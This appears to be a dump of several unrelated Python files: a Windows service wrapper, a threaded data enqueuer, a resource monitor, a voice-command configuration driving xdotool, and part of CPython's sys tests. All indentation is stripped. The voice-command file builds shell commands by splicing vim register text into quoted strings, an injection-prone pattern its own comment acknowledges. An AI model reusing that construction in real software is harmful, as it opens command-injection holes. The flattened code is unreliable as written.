# do the actual start
if do_start:
self.start()
log('Started. Waiting for stop')
index = win32event.WaitForMultipleObjects(
[self.stop_event, self.modification_handle],
False, win32event.INFINITE)
if index == 0:
# The stop event has been signaled. Stop execution.
keep_running = False
else:
# re-initialise handle
win32file.FindNextChangeNotification(self.modification_handle)
base_path = self._base_path
config_filename = self._config_filename
config_filepath = os.path.join(base_path, config_filename)
new_mtime = os.stat(config_filepath).st_mtime
if new_mtime != self.configuration_mtime:
self.configuration_mtime = new_mtime
do_start = True
log('Restarting child processes as the configuration '
'has changed')
self.stop()
self.config = read_config(base_path, config_filename)
else:
do_start = False
win32file.FindCloseChangeNotification(self.modification_handle)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
log('Stopping')
# Do the actual stop
self.stop()
log('Stopped')
win32event.SetEvent(self.stop_event)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
def start(self):
self.processes = start_commands(self.config)
def stop(self):
if self.processes:
end_commands(self.processes)
self.processes = []
node_name = platform.node()
if self.config.has_section(node_name):
clean = self.config.get(node_name, 'clean')
else:
clean = self.config.get('services', 'clean')
if clean:
for file in clean.split(';'):
try:
os.remove(file)
except:
error("Error while removing {0}\n{1}"
"".format(file, traceback.format_exc()))
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'test':
test_commands()
else:
IRMAService._base_path = dirname(abspath(__file__))
win32serviceutil.HandleCommandLine(IRMAService)
|
Enqueuer.py
|
from __future__ import absolute_import
import threading
import time
from abc import abstractmethod
try:
import queue
except ImportError:
import Queue as queue
class SequenceEnqueuer(object):
"""Base class to enqueue inputs, borrowed from Keras.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator, borrowed from Keras, simplified to use only multi-threading
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
thread.join(timeout)
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
monitor.py
|
#!/usr/bin/env python
# Copyright (c) 2020-2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2 License
# The full license information can be found in LICENSE.txt
# in the root directory of this project.
"""
-App for Resource Monitoring.
-Collects System CPU/Memory as well as AXON CPU/ Memory.
"""
import logging
import os
import queue
import threading
import time
import lydian.common.errors as errors
try:
import psutil
except errors.ModuleNotFoundError:
import lydian.utils.lpsutil as psutil
from lydian.apps.base import BaseApp, exposify
from lydian.recorder.record import ResourceRecord
log = logging.getLogger(__name__)
@exposify
class ResourceMonitor(BaseApp):
REPORT_INTERVAL = 2
def __init__(self, rqueue, interval=None, proc_name='runner'):
"""
A simple resource monitor that writes cpu / memory percentage
to wavefront at requested interval.
"""
self._rqueue = rqueue # records queue to put records onto.
self._interval = interval or self.REPORT_INTERVAL
self._stop_switch = threading.Event()
self._stop_switch.set() # Stopped until started.
self._proc_name = proc_name
self._thread = None
def stopped(self):
return self._stop_switch.is_set()
def _run(self):
p = psutil.Process(os.getpid())
while not self._stop_switch.is_set():
sys_cpu_percent = round(psutil.cpu_percent(), 2)
sys_mem_percent = round(psutil.virtual_memory().percent, 2)
sys_net_conns = int(len(psutil.net_connections()))
lydian_cpu_percent = round(p.cpu_percent(), 2)
lydian_mem_percent = round(p.memory_percent(), 2)
lydian_net_conns = int(len(p.connections()))
rec = ResourceRecord(sys_cpu_percent, sys_mem_percent,
sys_net_conns,
lydian_cpu_percent, lydian_mem_percent,
lydian_net_conns)
try:
self._rqueue.put(rec, block=False, timeout=2)
except queue.Full:
log.error("Cann't put Resource record %r into the queue.",
rec)
time.sleep(self._interval)
def is_running(self):
"""
Returns True if Rescoures are being monitored else False.
"""
return self._thread and self._thread.is_alive()
def stop(self):
"""
Stops Resource Monitoring.
"""
self._stop_switch.set()
if self.is_running():
self._thread.join()
self._thread = None
log.info("Stopped resource monitoring.")
def start(self):
"""
Starts Resource monitoring (in a separate thread)
"""
self._stop_switch.clear()
if not self._thread:
self._thread = threading.Thread(target=self._run)
self._thread.setDaemon(True)
self._thread.start()
log.info("Started resource monitoring.")
|
custom_commands.py
|
from threading import Thread
import json
import logging
from silviux.config.keys.command import vocab
from ezmouse.run import run_ezmouse
from vim_server.server import VimServer
logger = logging.getLogger(__name__)
vim_server = VimServer()
#Custom commands config is for simple mappings of grammar to executor side effects.
#ie you want to map spoken 'special' to a bash command $~/myspecialcommand.sh
#This file is messy in part because I created it by extracting out my worst code
#from the executor. But that's kind of the point. Add sloppy one off code here without breaking
#everything else.
#TODO pass the callbacks the parser's config, then you can replace the hardcoded vocab words
#ie you could add a 'windowjump' command to the config object then do config['vocab']['windowjump']
#tests currently rely on these vocab words not being changed
#custom_commands = {
# 'some_arbitrary_name': {
# 'grammar': [
# 'rhs of grammar rule',#the rule will be _custom_command_some_arbitrary_name ::= rhs of grammar rule
# 'terminal1 terminal2',#the rule will be _custom_command_some_arbitrary_name ::= terminal1 terminal2
# ]
# 'handler': exector_callback
# 'matcher': parser_callback
#The "handler" function gets passed the executor instance and the tokens/ast nodes from the parser's p_ function arguments
#The "matcher" function gets passed the parser instance and the tokens/ast nodes from the parser's p_ function arguments
def window_handler(executor, matches):
if matches[0] == 'windy':
if (len(matches) == 2):
executor.automator.mod_plus_key(['super'], str(matches[1]))
else:
executor.automator.raw_key('super')
executor.automator.raw_key('Down')
elif matches[0] == 'folly':
#gnome 3 is weird/janky about timing of some things
executor.automator.command('/usr/bin/xdotool key super+m && sleep 0.5 && /usr/bin/xdotool key Right key Right key Down')
elif matches[0] == 'cloudy':
# grave is the ~ key, asciitilde is something else
# executor.automator.command('/usr/bin/xdotool keydown Alt key asciitilde')
# executor.add_release('Alt')
return
elif matches[0] == 'caddy':
executor.automator.command('/usr/bin/xdotool keydown Alt key Tab')
executor.add_release('Alt')
elif matches[0] == 'jumpy':
executor.automator.command('/usr/bin/xdotool key Alt+grave')
elif matches[0] == 'moody':
executor.automator.mod_plus_key(['Alt'], 'Tab')
else:
logger.error('unknown value in window_handler')
custom_commands = {
'window': {
'grammar': [
'windy',
'windy _number',
'caddy',
'cloudy',
'jumpy',
'moody',
'folly'
],
'handler': window_handler
}
}
def tmux_handler(executor, matches):
if matches[1] == 'jumpy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key w')
elif matches[1] == 'moody':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key percent')
elif matches[1] == 'windy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key quotedbl')
elif matches[1] == 'cloudy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a key bracketleft')
elif matches[1] == 'caddy':
executor.automator.command('/usr/bin/xdotool key Ctrl+a Ctrl+a')
elif isinstance(matches[1], int):
executor.automator.command('/usr/bin/xdotool key Ctrl+a key ' + str(matches[1]))
else:
logger.error('bad token in tmux handler %s', matches)
custom_commands['tmux'] = {
'grammar': [
'timex jumpy',
'timex moody',
'timex windy',
'timex cloudy',
'timex caddy',
'timex _number'
],
'handler': tmux_handler
}
def mouse_handler(executor, matches):
# self.automator.command('/usr/bin/xdotool click 1')
# self.automator.command('/usr/bin/xdotool click 3')
# self.automator.command('/usr/bin/xdotool click --repeat 2 1')
Thread(target=run_ezmouse).start()
custom_commands['mouse'] = {
'grammar': [
'moose',
],
'handler': mouse_handler
}
#haha this code was simple before adding support for single word register replacements and optimistic mode support
#TODO needs a full rewrite, fix:
#1. It handles both the cases of using 'reggie ANY' and lone terminal tokens as register word, combining support for both in 1 function resulted in too many conditionals
#2. The register specific terminals should be declared elsewhere, its confusing for no benefit and makes whole custom command a leaky abstraction
def vim_handler(executor, matches):
if len(matches) == 1:
register_name = matches[0].type
token = matches[0]
msg = ["call", "GetRegister", [register_name], -1]
register_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", register_value)
#set undo attribute for optimistic, must be done before returning because new tokens each time
token.undo = {'key': True, 'len': len(register_value)}
if token.done: return
if register_value.find("NotFoundError:") == 0: return
for l in register_value:
#can look up in keys config for most, not 'space' 'backslash' and a few others
if l == ' ':
l = 'space'
executor.automator.xdo('key ' + l)
if matches[0] == 'reggie':
if len(matches) == 2:
msg = ["call", "GetRegister", [matches[1].extra], -1]
register_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", register_value)
#set undo attribute for optimistic, must be done before returning because new tokens each time
matches[1].undo = {'key': True, 'len': len(register_value)}
if matches[1].done: return
else:
#TODO matches[2] is either ANY or match from _custom_command_vim_programming
#the match from the custom command stuff is a custom command AST node so we have to drill way down to find the actual register word
if hasattr(matches[2], 'meta'):
msg = ["call", "SetRegister", [matches[2].meta[1][0].type], -1]
else:
msg = ["call", "SetRegister", [matches[2].extra], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
if register_value.find("NotFoundError:") == 0: return
#important! if you have a register with a value of $what bash thinks it is an env variable
#so be careful, quotes -- && etc are a problem and have to be escaped
#TODO probably an easy fix by using different python command than os.system
executor.automator.command('/usr/bin/xdotool type "' + register_value + '"')
if matches[0] == 'mackey':
if len(matches) == 2:
if matches[1] == 'ANY':
macro_name = matches[1].extra
else:
macro_name = matches[1].meta[1][0].type
msg = ["call", "GetMacro", [macro_name], -1]
macro_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", macro_value)
if macro_value.find("NotFoundError:") == 0: return
val = json.dumps({"macro": macro_value})
executor.q.put(val)
else:
if matches[2] == 'ANY':
macro_name = matches[2].extra
else:
macro_name = matches[2].meta[1][0].type
msg = ["call", "SetMacro", [macro_name], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
if matches[0] == 'tennis':
#TODO this will break in programming mode
if len(matches) == 2:
msg = ["call", "GetScript", [matches[1].extra], -1]
script_value = vim_server.send_and_get(json.dumps(msg))
logger.debug("return value from vim: %s", script_value)
if script_value.find("NotFoundError:") == 0: return
executor.automator.command(script_value)
else:
msg = ["call", "SetScript", [matches[2].extra], -1]
vim_server.send_and_get(json.dumps(msg))
vim_server.activate_window()
return
#only optimistic execute when getting register value
#all these conditionals go away if split the vim grammar into their own custom_command
#and add a way for adding terminals TODO if we make handler optional then adding
#a config with only a grammar would be a way... token would be _custom_command_keyofconfig
def vim_matcher(parser, matches):
if len(matches) == 2 and matches[0] == 'reggie':
#set register
pass
elif len(matches) == 1:
#terminal
pass
else:
parser.can_optimistic_execute = False
custom_commands['vim'] = {
'grammar': [
'reggie ANY',
'reggie sun ANY',
'mackey ANY',
'mackey sun ANY',
'tennis ANY',
'tennis sun ANY',
],
'matcher': vim_matcher,
'handler': vim_handler
}
custom_commands['vim_programming'] = {
'grammar': [
'philly',
'queens',
'pittsburgh',
'seattle',
'washington',
'columbia',
'denver',
'miami',
'london',
'elephant',
'zebra',
'dolphin',
# you can recursively define rules here but the match is a 'custom_command' ast node not a simple token
# likely a better option would be to have the above register names in a list and build it up programatically
# note as written 'reggie sun reggie sun mackey any' would parse into a single AST and the handler would try
# to set the 'reggie' register because its the 3rd match token
# Cleaner option would be a new custom_commands entry with the single tokens and noop executor handler
# Or even better add support for a new config that is a simple list of terminal tokens to be used within custom commands
# 'reggie sun ANY',
'reggie sun _custom_command_vim_programming',
'mackey _custom_command_vim_programming',
'mackey sun _custom_command_vim_programming',
'tennis _custom_command_vim_programming',
'tennis sun _custom_command_vim_programming',
],
'matcher': vim_matcher,
'handler': vim_handler
}
def nautilus_handler(executor, matches):
if matches[2] == None:
matches[2] = 1
for _ in range(matches[2]):
if matches[1] == vocab['left']:
executor.automator.mod_plus_key(['ctrl'], 'Prior')
elif matches[1] == vocab['right']:
executor.automator.mod_plus_key(['ctrl'], 'Next')
#TODO _repeat just matches a number, we get no repeat functionality from the executor
#Look in parser.py, r_repeat just returns a number and the r_motion returns repeat AST nodes
#I guess if we want to use the executor's repeat ability we have to somehow wrap the custom command AST node
#in a repeat node so the postorder_flat fn invokes our handler callback n times? not sure if thats desirable...
#would be simple enough to manually loop using the _repeat value from our handler function.
custom_commands['nautilus'] = {
'grammar': [
"mango %s _repeat" % (vocab['left'],),
"mango %s _repeat" % (vocab['right'],),
],
'handler': nautilus_handler
}
def fkey_handler(executor, matches):
fkey = 'F' + ''.join([str(n) for n in matches[1:]])
executor.automator.raw_key(fkey)
custom_commands['fkey'] = {
'grammar': [
'floppy _number',
'floppy _number _number',
],
'handler': fkey_handler
}
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
